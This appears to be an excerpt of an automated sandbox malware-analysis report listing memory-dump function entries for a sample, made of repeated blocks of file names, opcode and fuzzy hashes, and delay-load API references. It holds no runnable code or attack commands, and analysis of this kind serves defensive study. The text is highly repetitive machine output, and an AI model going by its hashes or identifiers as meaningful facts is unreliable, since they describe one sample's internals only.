                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0a4d682a0e489d6962c88b842fe9bab7a5fe84b371c993a3de0bb9609b86cb53
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 0a4d682a0e489d6962c88b842fe9bab7a5fe84b371c993a3de0bb9609b86cb53
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 3c166f0c043a34c8858a6a0849dcddd0729bea73d03b6c11e07cc9737e936ffd
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 3c166f0c043a34c8858a6a0849dcddd0729bea73d03b6c11e07cc9737e936ffd
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f90d0a79c2b8f42bb6e3d983fb54841dbc492e226fe1e12073a11906055fc7a1
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: f90d0a79c2b8f42bb6e3d983fb54841dbc492e226fe1e12073a11906055fc7a1
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 5afce2b7d672a3878be0500da61e028c669a34f6cf53508aecc8cecf914daee2
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 5afce2b7d672a3878be0500da61e028c669a34f6cf53508aecc8cecf914daee2
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 9f0ad9904c00d1588ca7fee20bbff046ae6cebfadd549be82301ed2cbebdb37e
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 9f0ad9904c00d1588ca7fee20bbff046ae6cebfadd549be82301ed2cbebdb37e
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 91ff5db6bd7d6e0e369f6dae9f283c340b5a01cefbec048736ef3a43e4930830
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 91ff5db6bd7d6e0e369f6dae9f283c340b5a01cefbec048736ef3a43e4930830
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 4b243747ca51e55185e128f97cdef75db13037c81d6d097de4e37640561bcdfd
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 4b243747ca51e55185e128f97cdef75db13037c81d6d097de4e37640561bcdfd
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          Function 00FCE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 84ef7b4a2934e410f02998ed9fa3f1da7029b09242e6ff0a68f30ba49021dab8
                                                          • Instruction ID: 33925563c6725606d792df2b69f917aebf66c2517511b957215c461ad5e4c4c7
                                                          • Opcode Fuzzy Hash: 84ef7b4a2934e410f02998ed9fa3f1da7029b09242e6ff0a68f30ba49021dab8
                                                          • Instruction Fuzzy Hash: FAA001E66AA1D37D321862526E07E7B261EC4C1B25331956EF829A54C1AC84684638B7
                                                          Function 00FCE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 1ac43b1ef23d37d4552b6465ef55397492a644fa236faf60c1eb96cca96c9699
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 1ac43b1ef23d37d4552b6465ef55397492a644fa236faf60c1eb96cca96c9699
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          Function 00FCE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 6a3d10c1a340da26bb1128cdea34bb73ecc6c789f912f0e0f35209e673fc76b4
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 6a3d10c1a340da26bb1128cdea34bb73ecc6c789f912f0e0f35209e673fc76b4
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          Function 00FCE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: a340348aec58da8adfd25e27744030489651295924c0f8dbdb387390591ca78e
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: a340348aec58da8adfd25e27744030489651295924c0f8dbdb387390591ca78e
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          Function 00FCE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 1817a45f7d6351ec8064f20319b6ee58f192caafe3a45dc3e546366e587ca26f
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 1817a45f7d6351ec8064f20319b6ee58f192caafe3a45dc3e546366e587ca26f
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          Function 00FCE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE3FC
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 49c1be034edcfa93aa78b99dfe65cceed47809b2544ce3f77a9eda4c39588f8f
                                                          • Instruction ID: fb2c633c1f97c82a9874e457c64d323f883e19084f1efb88a15f7d4904ae7232
                                                          • Opcode Fuzzy Hash: 49c1be034edcfa93aa78b99dfe65cceed47809b2544ce3f77a9eda4c39588f8f
                                                          • Instruction Fuzzy Hash: 7FA001E66AA1D3BC321862526E07E7B261EC4C5B61331996EF81A954C1A884684638B7
                                                          Function 00FCE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 5459d271fa466a60ef76b42aa56a11f29728e71a447b6cb75cc9da8fe6ce66d0
                                                          • Instruction ID: e88b55d964d1f0847a459ba5af09d836965933092be5b57ceaee332cdc85a38b
                                                          • Opcode Fuzzy Hash: 5459d271fa466a60ef76b42aa56a11f29728e71a447b6cb75cc9da8fe6ce66d0
                                                          • Instruction Fuzzy Hash: 49A001D7AAA193BC310862A26E07E3B221DC4C5B65335992EF81AC54C1A898586639B2
                                                          Function 00FCE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 4c1b9dfa2630f02530599185b3c6e43693b73f2555e9d775f078fd668b7b3dc5
                                                          • Instruction ID: e88b55d964d1f0847a459ba5af09d836965933092be5b57ceaee332cdc85a38b
                                                          • Opcode Fuzzy Hash: 4c1b9dfa2630f02530599185b3c6e43693b73f2555e9d775f078fd668b7b3dc5
